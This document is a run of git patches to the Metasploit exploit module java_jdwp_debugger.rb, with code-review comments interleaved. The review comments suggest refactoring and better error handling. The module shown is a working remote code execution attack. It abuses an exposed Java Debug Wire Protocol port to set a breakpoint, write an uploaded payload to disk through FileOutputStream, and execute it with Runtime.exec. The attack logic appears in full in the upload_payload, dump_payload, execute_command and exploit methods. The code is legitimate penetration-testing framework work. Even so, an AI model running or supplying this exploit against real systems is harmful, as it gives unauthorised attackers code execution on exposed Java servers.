@@ -309,83 +309,64 @@ class Metasploit3 < Msf::Exploit::Remote # Gets the sizes of variably-sized data types in the target VM - def idsizes - + def get_sizes + formats = [ + ["I", "fieldid_size"], + ["I", "methodid_size"], + ["I", "objectid_size"], + ["I", "referencetypeid_size"], + ["I", "frameid_size"] + ] sock.put(create_packet(IDSIZES_SIG)) response = read_reply(datastore['RESPONSE_TIMEOUT']) - - formats = [ - ["I", "fieldid_size"], - ["I", "methodid_size"], - ["I", "objectid_size"], - ["I", "referencetypeid_size"], - ["I", "frameid_size"] - ] - entries = parse_entries(response, formats, false) - entries.each { |e| @vars.merge!(e) } - end # Gets the JDWP version implemented by the target VM def get_version - - sock.put(create_packet(VERSION_SIG)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["S", "descr"], - ["I", "jdwp_major"], - ["I", "jdwp_minor"], - ["S", "vm_version"], - ["S", "vm_name"] + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] ] - + sock.put(create_packet(VERSION_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) entries = parse_entries(response, formats, false) - entries.each { |e| @vars.merge!(e) } - end def version - return "#{@vars["vm_name"]} - #{@vars["vm_version"]}" + "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end # Returns reference types for all classes currently loaded by the target VM def get_all_classes - return unless @classes.empty? 
- sock.put(create_packet(ALLCLASSES_SIG)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["C", "reftype_tag"], - [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] ] - - print_status("#{peer} - Parsing list of classes...") - + sock.put(create_packet(ALLCLASSES_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) @classes.append(parse_entries(response, formats)) - end # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - @classes.each do |entry_array| - entry_array.each do |entry| - - return entry if entry["signature"].downcase == name.downcase + if entry["signature"].downcase == name.downcase + return entry + end end end 
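Review bot: The rewritten test in `get_class_by_name` still folds case (`entry["signature"].downcase == name.downcase`), but JVM type signatures are case-sensitive. Two loaded classes whose signatures differ only in case cannot be told apart here, and whichever comes first in `@classes` is returned. An exact comparison, `return entry if entry["signature"] == name`, avoids that, provided callers pass the canonical spelling. The `str2fqclass` comment later in this patch writes `Serversocket` for `ServerSocket`, so it is worth checking whether any caller relies on the folding. The rename of `idsizes` to `get_sizes` in this hunk also needs its call site updated; that line is not part of this hunk.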
@@ -395,32 +376,24 @@ class Metasploit3 < Msf::Exploit::Remote # Returns information for each method in a reference type (ie. object). Inherited methods are not included. # The list of methods will include constructors (identified with the name "<init>") def get_methods(reftype_id) + if @methods.has_key?(reftype_id) + return @methods[reftype_id] + end - unless @methods.has_key?(reftype_id) - - refid = format(@vars["referencetypeid_size"],reftype_id) - - sock.put(create_packet(METHODS_SIG, refid)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - - formats = [ + formats = [ [@vars["methodid_size"], "method_id"], ["S", "name"], ["S", "signature"], ["I", "mod_bits"] - ] - - @methods[reftype_id] = parse_entries(response, formats) - - end - - return @methods[reftype_id] + ] + ref_id = format(@vars["referencetypeid_size"],reftype_id) + sock.put(create_packet(METHODS_SIG, ref_id)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + @methods[reftype_id] = parse_entries(response, formats) end # Checks if specified method is currently loaded by the target VM and returns it def get_method_by_name(classname, name, signature = nil) - @methods[classname].each do |entry| if signature.nil? return entry if entry["name"].downcase == name.downcase 
@@ -435,27 +408,20 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) - target_class = get_class_by_name(looked_class) - fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class get_methods(target_class["reftype_id"]) - target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method return target_class, target_method - end # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) - i = s.rindex(".") - fail_with(Failure::BadConfig, 'Bad defined break class') unless i method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string @@ -465,7 +431,6 @@ class Metasploit3 < Msf::Exploit::Remote classname << ';' return classname, method - end @@ -480,34 +445,25 @@ class Metasploit3 < Msf::Exploit::Remote # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) - data = [event_code].pack('C') data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') args.each do |kind,option| - data << [kind].pack('C') data << option - end sock.put(create_packet(EVENTSET_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) - fail_with(Exploit::Failure::Unknown, "No network response") unless response - return response.unpack('N')[0] - end # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event - force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) - buf = read_reply(datastore['BREAK_TIMEOUT']) return buf 
@@ -516,12 +472,8 @@ class Metasploit3 < Msf::Exploit::Remote # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event - print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") - print_status("#{rhost}") - print_status("#{datastore['BREAKPOINT_PORT']}") - rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, 'PeerPort' => datastore['BREAKPOINT_PORT'], @@ -531,23 +483,19 @@ class Metasploit3 < Msf::Exploit::Remote rex_socket.shutdown rex_socket.close - print_status("BYE force_net_event") end # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) - r_id = buf[6..9].unpack('N')[0] return nil unless event_id == r_id len = @vars["objectid_size"] - t_id = unformat(len,buf[10..10+len-1]) return r_id, t_id - end @@ -555,9 +503,7 @@ class Metasploit3 < Msf::Exploit::Remote def clear_event(event_code, r_id) data = [event_code].pack('C') data << [r_id].pack('N') - sock.put(create_packet(EVENTCLEAR_SIG, data)) - read_reply(datastore['RESPONSE_TIMEOUT']) end 
@@ -565,78 +511,57 @@ class Metasploit3 < Msf::Exploit::Remote # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) - data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) - data = format(@vars["objectid_size"], obj_id) data << format(@vars["objectid_size"], thread_id) - data << format(@vars["referencetypeid_size"], class_id) - data << format(@vars["methodid_size"], meth_id) - data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(INVOKEMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. 
def create_instance(class_id, thread_id, meth_id, args = []) - data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end @@ -651,7 +576,6 @@ class Metasploit3 < Msf::Exploit::Remote # Configures payload according to targeted architecture def setup_payload - # 1. Setting up generic values. payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe 
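Review bot: After this cleanup `invoke_static`, `invoke` and `create_instance` each end with `buf = read_reply(datastore['RESPONSE_TIMEOUT'])` followed by a bare `buf`. The temporary adds nothing; `read_reply(datastore['RESPONSE_TIMEOUT'])` as the last expression says the same. The three bodies also repeat an identical argument loop (`data << arg`, `data << [0].pack('N')`), which one private helper could state once. `send_event` guards against a missing reply, which suggests `read_reply` can return nil, yet callers later in this patch index the result as `buf[0]`. A one-line comment on each method stating the return contract would make that visible.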
@@ -668,199 +592,137 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform') end - return payload_exe, pl_exe end # Invokes java.lang.System.getProperty() for OS fingerprinting purposes def fingerprint_os(thread_id) - size = @vars["objectid_size"] # 1. Creates a string on target VM with the property to be getted cmd_obj_ids = create_string("os.name") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 - cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets property data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty") - buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C') str = unformat(size, buf[1..1+size-1]) - @os = solve_string(format(@vars["objectid_size"],str)) - end # Creates a file on the server given a execution thread def create_file(thread_id, filename) - cmd_obj_ids = create_string(filename) - fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] - size = @vars["objectid_size"] - data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V") - buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') file = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? 
|| (file == 0) register_files_for_cleanup(filename) - return file - + file end # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) - size = @vars["objectid_size"] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") - buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') decoder = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0) cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] - data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") - buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C') pl = unformat(size, buf[1..1+size-1]) - - return pl - + pl end # Dumps the payload on a opened server file given a execution thread def dump_payload(thread_id, file, pl) - size = @vars["objectid_size"] - data = [TAG_OBJECT].pack('C') data << format(size, pl) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") - buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C') - end # Closes a file on the server given a execution thread def close_file(thread_id, file) 
- size = @vars["objectid_size"] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") - buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) - fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C') - end - # Executes a system command on target VM making use of java.lang.Runtime.exec() def execute_command(thread_id, cmd) - size = @vars["objectid_size"] # 1. Creates a string on target VM with the command to be executed cmd_obj_ids = create_string(cmd) - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets Runtime context runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") - buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') rt = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0) # 3. Finds and executes "exec" method supplying the string with the command exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") - fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') - end - # Sets a breakpoint on frequently called method (user-defined) def set_breakpoint - vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}") # 1. 
Gets reference of the method where breakpoint is going to be setted classname, method = str2fqclass(datastore['BREAKPOINT']) - break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) - m = get_method_by_name(break_class["reftype_id"], method) - fail_with(Failure::BadConfig, "Method of Break Class not found") unless m # 2. Sends event request for this method @@ -870,18 +732,15 @@ class Metasploit3 < Msf::Exploit::Remote loc << [0,0].pack('NN') data = [[MODKIND_LOCATIONONLY, loc]] - r_id = send_event(EVENT_BREAKPOINT, data) - fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id - return r_id + r_id end # Uploads & executes the payload on the target VM def exec_payload(thread_id) - # 0. Fingerprinting OS fingerprint_os(thread_id) @@ -909,12 +768,10 @@ class Metasploit3 < Msf::Exploit::Remote # 6. Executes the dumped payload cmd = "#{payload_exe}" execute_command(thread_id, cmd) - end def exploit - @my_id = 0x01 @vars = {} @classes = [] 
@@ -927,50 +784,43 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") end - # 1. Get the sizes of variably-sized data types in the target VM - idsizes + print_status("#{peer} - Retriving the sizes of variable sized data types in the target VM...") + get_sizes - # 2. Get the version of the target VM + print_status("#{peer} - Getting the version of the target VM...") get_version - # 3. Get all currently loaded classes by the target VM + print_status("#{peer} - Getting all currently loaded classes by the target VM...") get_all_classes - # 4. Sets a breakpoint on frequently called method (user-defined) + print_status("#{peer} - Setting a breakpoint on #{datastore['BREAKPOINT']}...") r_id = set_breakpoint - # 5. Resume VM and wait for event + print_status("#{peer} - Resuming VM and waiting for an event...") resume_vm secs = datastore['BREAK_TIMEOUT'] - ret = "" - datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") - buf = wait_for_event - ret = parse_event_breakpoint(buf, r_id) - break unless ret.nil? - end r_id, t_id = ret vprint_status("#{peer} - Received matching event from thread #{t_id}") - # 6. Clears event + print_status("#{peer} - Deleting breakpoint...") clear_event(EVENT_BREAKPOINT, r_id) - # 7. Drop & execute payload + print_status("#{peer} - Dropping and executing payload...") exec_payload(t_id) + print_status("#{peer} - Resuming the target VM...") resume_vm disconnect - end end From d184717e5507cf9bea1037cd1718659fb1c6a5bd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:24:34 -0500 Subject: [PATCH 488/853] delete blank lines --- .../exploits/multi/misc/java_jdwp_debugger.rb | 39 +++---------------- 1 file changed, 5 insertions(+), 34 deletions(-) 
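Review bot: In `exploit`, `r_id, t_id = ret` runs right after the retry loop with no check that any attempt produced a matching event. Judging by `break unless ret.nil?`, `parse_event_breakpoint` appears to return nil on a mismatch, so an exhausted loop would pass nil ids on to `clear_event` and `exec_payload`. A guard such as `fail_with(Failure::Unknown, "#{peer} - No matching breakpoint event received") if ret.nil? || ret.empty?` before the destructuring would report that case clearly. The new status line also misspells "Retrieving": `print_status("#{peer} - Retrieving the sizes of variable sized data types in the target VM...")`.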
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 0b29ebe67c..fa68793ec2 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
@@ -143,85 +143,58 @@ class Metasploit3 < Msf::Exploit::Remote def peer - return "#{rhost}:#{rport}" + "#{rhost}:#{rport}" end # Establishes handshake with the server def handshake sock.put(HANDSHAKE) - return sock.get(datastore['RESPONSE_TIMEOUT']) end # Forges packet for JDWP protocol def create_packet(cmdsig, data="") flags = 0x00 - cmdset, cmd = cmdsig - pktlen = data.length + 11 - buf = [pktlen, @my_id, flags, cmdset, cmd] - pkt = buf.pack("NNCCC") - pkt << data - @my_id += 2 - - return pkt + pkt end # Reads packet response for JDWP protocol def read_reply(timeout) - response = sock.get(timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - pktlen,id,flags,errcode = response.unpack('NNCn') - response.slice!(0..10) - fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) - - return response + response end # Returns the characters contained in the string defined in target VM def solve_string(data) - sock.put(create_packet(STRINGVALUE_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) - return "" unless response - return read_string(response) - end # Unpacks received string structure from the server response into a normal string def read_string(data) - data_len = data.unpack('N')[0] - data.slice!(0..3) - return data.slice!(0,data_len) - end # Creates a new string object in the target VM and returns its id def create_string(data) buf = build_string(data) - sock.put(create_packet(CREATESTRING_SIG, buf)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) - end # Packs normal string into string structure for target VM @@ -229,8 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = [data.length].pack('N') ret << data - return ret - + ret end 
@@ -243,7 +215,6 @@ class Metasploit3 < Msf::Exploit::Remote end fail_with(Failure::Unknown, "Unknown format") - end # Unpack Fixnum from JDWP protocol @@ -304,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote entries.append(data) end - return entries + entries end From 837668d083d9a429b500da376ce1101e160b0a15 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:48:53 -0500 Subject: [PATCH 489/853] use optiona argument for read_reply --- .../exploits/multi/misc/java_jdwp_debugger.rb | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index fa68793ec2..2a901af23f 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -146,6 +146,10 @@ class Metasploit3 < Msf::Exploit::Remote "#{rhost}:#{rport}" end + def default_timeout + datastore['RESPONSE_TIMEOUT'] + end + # Establishes handshake with the server def handshake sock.put(HANDSHAKE) @@ -165,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Reads packet response for JDWP protocol - def read_reply(timeout) + def read_reply(timeout = default_timeout) response = sock.get(timeout) fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response pktlen,id,flags,errcode = response.unpack('NNCn') @@ -177,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote # Returns the characters contained in the string defined in target VM def solve_string(data) sock.put(create_packet(STRINGVALUE_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply return "" unless response return read_string(response) end 
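Review bot: The new `default_timeout` helper is the only method in this area without a one-line comment; I would add `# Default number of seconds to wait for a server reply (RESPONSE_TIMEOUT option)` above it. For consistency, `handshake` could use the helper too: in the previous patch on this page it still calls `sock.get(datastore['RESPONSE_TIMEOUT'])`, and that line sits just outside this hunk, so `sock.get(default_timeout)` would complete the change. The body of `handshake` continues past the end of the hunk.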
@@ -193,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote def create_string(data) buf = build_string(data) sock.put(create_packet(CREATESTRING_SIG, buf)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) end @@ -289,7 +293,7 @@ class Metasploit3 < Msf::Exploit::Remote ["I", "frameid_size"] ] sock.put(create_packet(IDSIZES_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end @@ -305,7 +309,7 @@ class Metasploit3 < Msf::Exploit::Remote ["S", "vm_name"] ] sock.put(create_packet(VERSION_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end @@ -327,7 +331,7 @@ class Metasploit3 < Msf::Exploit::Remote ["I", "status"] ] sock.put(create_packet(ALLCLASSES_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply @classes.append(parse_entries(response, formats)) end @@ -359,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ref_id = format(@vars["referencetypeid_size"],reftype_id) sock.put(create_packet(METHODS_SIG, ref_id)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply @methods[reftype_id] = parse_entries(response, formats) end @@ -408,7 +412,7 @@ class Metasploit3 < Msf::Exploit::Remote # Resumes execution of the application after the suspend command or an event has stopped it def resume_vm sock.put(create_packet(RESUMEVM_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply fail_with(Exploit::Failure::Unknown, "No network response") unless response end 
@@ -426,7 +430,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(EVENTSET_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply fail_with(Exploit::Failure::Unknown, "No network response") unless response return response.unpack('N')[0] end @@ -475,7 +479,7 @@ class Metasploit3 < Msf::Exploit::Remote data = [event_code].pack('C') data << [r_id].pack('N') sock.put(create_packet(EVENTCLEAR_SIG, data)) - read_reply(datastore['RESPONSE_TIMEOUT']) + read_reply end @@ -493,7 +497,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end @@ -513,7 +517,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(INVOKEMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end @@ -531,7 +535,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end From 6c643f8837c2433c27c44a1f973e764688366308 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:14:23 -0500 Subject: [PATCH 490/853] Fix usage of Rex::Sockket::Tcp --- .../exploits/multi/misc/java_jdwp_debugger.rb | 36 ++++++++++++------- 1 file changed, 23 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 2a901af23f..b645c29a5e 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb 
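Review bot: In `invoke_static`, `invoke` and `create_instance`, the new `buf = read_reply` is immediately followed by a bare `buf`, so the local no longer serves a purpose. Ending each method with `read_reply` as its last expression says the same thing in one line. The three hunks (`-493`, `-513`, `-531`) share the pattern, and each method begins outside its hunk.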
@@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8000), - OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), @@ -172,9 +171,11 @@ class Metasploit3 < Msf::Exploit::Remote def read_reply(timeout = default_timeout) response = sock.get(timeout) fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - pktlen,id,flags,errcode = response.unpack('NNCn') + pktlen, id, flags, errcode = response.unpack('NNCn') response.slice!(0..10) - fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) + if errcode != 0 && flags == REPLY_PACKET_TYPE + fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}") + end response end @@ -245,15 +246,17 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| - print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 + if var != 0 && var % 1000 == 0 + vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + end data = {} formats.each do |fmt,name| - if fmt == "L" or fmt == 8 + if fmt == "L" || fmt == 8 data[name] = buf.unpack('Q>')[0] buf.slice!(0..7) - elsif fmt == "I" or fmt == 4 + elsif fmt == "I" || fmt == 4 data[name] = buf.unpack('N')[0] buf.slice!(0..3) elsif fmt == "S" 
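Review bot: `read_reply` unpacks `pktlen` but never compares it with what `sock.get` returned, and it strips the 11-byte header without checking that 11 bytes arrived. A truncated reply leaves `errcode` nil and skips the error branch, and a read that carries more than one packet is handed to the caller as a single body. Before the `unpack`, I would add `fail_with(Failure::UnexpectedReply, "#{peer} - Truncated reply") if response.length < 11`, and then verify `pktlen == response.length + 11` after the slice. Whether `sock.get` can coalesce packets here is not visible from the hunk.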
@@ -431,7 +434,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(EVENTSET_SIG, data)) response = read_reply - fail_with(Exploit::Failure::Unknown, "No network response") unless response + fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") unless response return response.unpack('N')[0] end @@ -450,14 +453,21 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( - 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAKPOINT_PORT'], + 'PeerHost' => rhost, + 'PeerPort' => datastore['BREAKPOINT_PORT'] ) + add_socket(rex_socket) + rex_socket.put("GET / HTTP/1.0\r\n\r\n") - rex_socket.shutdown - rex_socket.close + begin + rex_socket.shutdown + rex_socket.close + rescue IOError + end + + remove_socket(rex_socket) end @@ -756,7 +766,7 @@ class Metasploit3 < Msf::Exploit::Remote connect unless handshake == HANDSHAKE - fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") + fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end print_status("#{peer} - Retriving the sizes of variable sized data types in the target VM...") @@ -793,7 +803,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Dropping and executing payload...") exec_payload(t_id) - print_status("#{peer} - Resuming the target VM...") + print_status("#{peer} - Resuming the target VM, just in case...") resume_vm disconnect From 77eeb5209a3d404c4585ca646e4eb4f41264ce55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:23:21 -0500 Subject: [PATCH 491/853] Do small cleanups --- .../exploits/multi/misc/java_jdwp_debugger.rb | 82 +++++++++++-------- 1 file changed, 49 insertions(+), 33 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index b645c29a5e..aefb7c55ae 100644 
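Review bot: The new `rescue IOError` around `shutdown`/`close` has an empty body and no comment, so a reader cannot tell that the error is ignored on purpose; a short note such as `# socket already closed by the peer, nothing left to release` would make the intent explicit (confirm that this is the case being handled). `remove_socket(rex_socket)` is also skipped if `put` raises, because `put` sits outside the `begin`; moving `put` inside the block and `remove_socket` into an `ensure` clause keeps the registration and the cleanup paired. The method's `def` line is outside this hunk.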
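Review bot: In the `-756` hunk the handshake failure message loses its `#{peer} - ` prefix, while this same commit adds that prefix to the `fail_with` calls in `read_reply` and `send_event`. One convention should apply to all of them: either keep `fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found")`, or, if `fail_with` already reports the peer (not visible here), drop the prefix from the other two as well.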
